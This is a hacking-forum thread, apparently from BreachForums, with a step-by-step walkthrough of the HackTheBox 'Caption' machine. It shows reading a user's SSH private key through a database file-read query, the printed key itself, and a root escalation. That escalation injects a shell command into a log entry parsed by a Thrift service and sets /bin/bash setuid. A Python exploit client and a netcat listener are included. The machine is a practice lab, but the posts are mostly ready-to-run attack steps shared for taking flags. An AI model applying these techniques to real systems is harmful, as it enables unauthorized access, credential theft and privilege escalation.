Sep 16, 2024, 11:02 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
Sep 16, 2024, 01:26 PM
(Sep 15, 2024, 01:21 PM)idontevensmokebro Wrote: Chasing after intended route. - You get the information regarding the bot as note on the Firewalls page (Admins are actively addressing ...) - You know there's a cache in use due to the HTTP response headers - You'll see requests to the javascript file with the `utm_source` parameter in the network traffic / HTML code - The header to use is pretty common --> you'll get the admin cookie Then you just need to bypass the ACL and download the SSH key. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Sep 16, 2024, 01:38 PM
(This post was last modified: Sep 16, 2024, 01:55 PM by Anonymous2224.)
USER FLAG // https://breachforums.bf/User-user142// THANK YOU
your kali machine: $ echo "10.10.11.33" caption.htb >> /etc/hosts ############################################## //browser http://caption.htb:8080/ root:root ############################################## http://10.129.204.201:8080/admin/dbviewer ################################################################# SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR); //you get loke this: 2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a6233426c626e4e7a614331725a586b74646a45414141414142473576626d554141414145626d39755a5141414141414141414142414141416141414141424e6c5932527a5953317a614745790a4c573570633352774d6a55324141414143473570633352774d6a55324141414151515277734d386a4f2b574475443546643735347851492f766a304e514a6267545353385755354f4c546a460a31557474625263797575356b6562762b466c414f656f436958476f5871364745535a686e374d50693241706f414141416f476935534a6c6f7555695a414141414532566a5a484e684c584e6f0a59544974626d6c7a644841794e54594141414149626d6c7a644841794e54594141414242424843777a794d3735594f34506b5633766e6a46416a2b2b505131416c75424e4a4c785a546b34740a4f4d585653323174467a4b36376d5235752f345755413536674b4a63616865726f59524a6d476673772b4c59436d674141414167554133384e642b7656306347417843766f5652326761362f0a6834493153777a2b54697773536e7a35393363414141414141514944424155474277673d0a2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a ################################################################### $ apt install xxd ###################### $ echo "2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a6233426c626e4e7a614331725a586b74646a45414141414142473576626d554141414145626d39755a5141414141414141414142414141416141414141424e6c5932527a5953317a614745790a4c573570633352774d6a55324141414143473570633352774d6a55324141414151515277734d386a4f2b574475443546643735347851492f766a304e514a6267545353385755354f4c546a460a31557474625263797575356b6562762b466c414f656f436958476f5871364745535a686e374d50693241706f414141416f476935534a6c6f7555695a414141414532566a5a484e684c584e6f0a59544974626d6c7a644841794e54594141414149626d6c7a644841794e54594141414242424843777a794d3735594f34506b5633766e6a46416a2b2b505131416c75424e4a4c785a546b34740a4f4d585653323174467a4b36376d5235752f345755413536674b4a63616865726f59524a6d476673772b4c59436d674141414167554133384e642b7656306347417843766f5652326761362f0a6834493153777a2b54697773536e7a35393363414141414141514944424155474277673d0a2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a" | xxd -r -p ##################################################################### $ sudo nano id_ecdsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRwsM8jO+WDuD5Fd754xQI/vj0NQJbgTSS8WU5OLTjF 1UttbRcyuu5kebv+FlAOeoCiXGoXq6GESZhn7MPi2ApoAAAAoGi5SJlouUiZAAAAE2VjZHNhLXNo YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHCwzyM75YO4PkV3vnjFAj++PQ1AluBNJLxZTk4t OMXVS21tFzK67mR5u/4WUA56gKJcaheroYRJmGfsw+LYCmgAAAAgUA38Nd+vV0cGAxCvoVR2ga6/ h4I1Swz+TiwsSnz593cAAAAAAQIDBAUGBwg= -----END OPENSSH PRIVATE KEY----- $ chmod 600 id_ecdsa ####################################################################### $ ssh -i id_ecdsa margo@caption.htb ####################################################################### $ margo@caption:~$ cat user.txt user flag ROOT FLAG //https://breachforums.bf/User-psymonsezz//THANK YOU ######################################################## #####your Kali machine: ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb #####remote machine: $ cd /tmp/ $ nano malicious.log 127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #" $ nano payload.sh chmod +s /bin/bash #####your Kali machine: create new terminal window: $ nano log_service.thrift namespace go log_service service LogService { string ReadLogFile(1: string filePath) } Make sure thrift is installed or install: $ wget http://www.apache.org/dyn/closer.cgi?pat...0.0.tar.gz $ tar -xvf thrift-0.20.0.tar.gz $ cd thrift-0.20.0 $ ./bootstrap.sh $ ./configure $ sudo make $ sudo make install Now run: $ thrift -r --gen py log_service.thrift $ cd gen-py $ nano client.py from thrift import Thrift from thrift.transport import TSocket from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol from log_service import LogService # Import generated Thrift client code def main(): # Set up a transport to the server transport = TSocket.TSocket('localhost', 9090) # Buffering for performance transport = TTransport.TBufferedTransport(transport) # Using a binary protocol protocol = TBinaryProtocol.TBinaryProtocol(transport) # Create a client to use the service client = LogService.Client(protocol) # Open the connection transport.open() try: # Specify the log file path to process log_file_path = "/tmp/malicious.log" # Call the remote method ReadLogFile and get the result response = client.ReadLogFile(log_file_path) print("Server response:", response) except Thrift.TException as tx: print(f"Thrift exception: {tx}") # Close the transport transport.close() if __name__ == '__main__': main() $ python3 client.py #####remote machine: margo@caption:/tmp$ /bin/bash -p bash-5.1# id uid=1000(margo) gid=1000(margo) euid=0(root) egid=0(root) groups=0(root),1000(margo) bash-5.1# cat /root/root.txt root flag This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying to someone else's scam report | Failure to follow the first fucking rule of the scam reports section
Sep 16, 2024, 02:15 PM
(Sep 15, 2024, 08:55 AM)local Wrote: └─$ nc -lnvp 4444 i did that, but when i use the ssh command, it still asks me for my password
Sep 16, 2024, 10:32 PM
I think in every restart the flags and the ssh key are recreated -
Sep 16, 2024, 11:58 PM
(Sep 16, 2024, 10:15 PM)Siren Wrote:use sudo when you run sshvaaditya320 dateline='[url=tel:1726496151' Wrote: 1726496151[/url]'] This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Sep 17, 2024, 09:17 AM
Can someone show me the intended way to user via XSS,,,,I was confused about it
Sep 17, 2024, 10:11 AM
(Sep 14, 2024, 07:29 PM)FallenAngel Wrote:(Sep 14, 2024, 07:27 PM)rootme1122 Wrote: https://github.com/kacperszurek/exploits...ted-rce.md it's not work for me
Sep 17, 2024, 10:16 AM
(Sep 17, 2024, 10:11 AM)hhbhhb Wrote:(Sep 14, 2024, 07:29 PM)FallenAngel Wrote:(Sep 14, 2024, 07:27 PM)rootme1122 Wrote: https://github.com/kacperszurek/exploits...ted-rce.md Nope, the authenticated could maybe be used. Turns out that running a Burpsuite brute force on the login page was the way to go. Then you have creds, then you can try the aunthenticated one. However, there are easier ways to get in, which you can find in the thread.
Sep 17, 2024, 07:44 PM
This will help for user --> https://medium.com/r3d-buck3t/chaining-h...535a9621a2
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 66 | 1,783 |
4 hours ago Last Post: vlka |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 370 | 92,504 |
9 hours ago Last Post: lifolifo007 |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,214 |
Yesterday, 02:10 PM Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,525 |
Apr 29, 2026, 11:06 PM Last Post: op334 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 414 |
Apr 29, 2026, 10:36 PM Last Post: op334 |
|

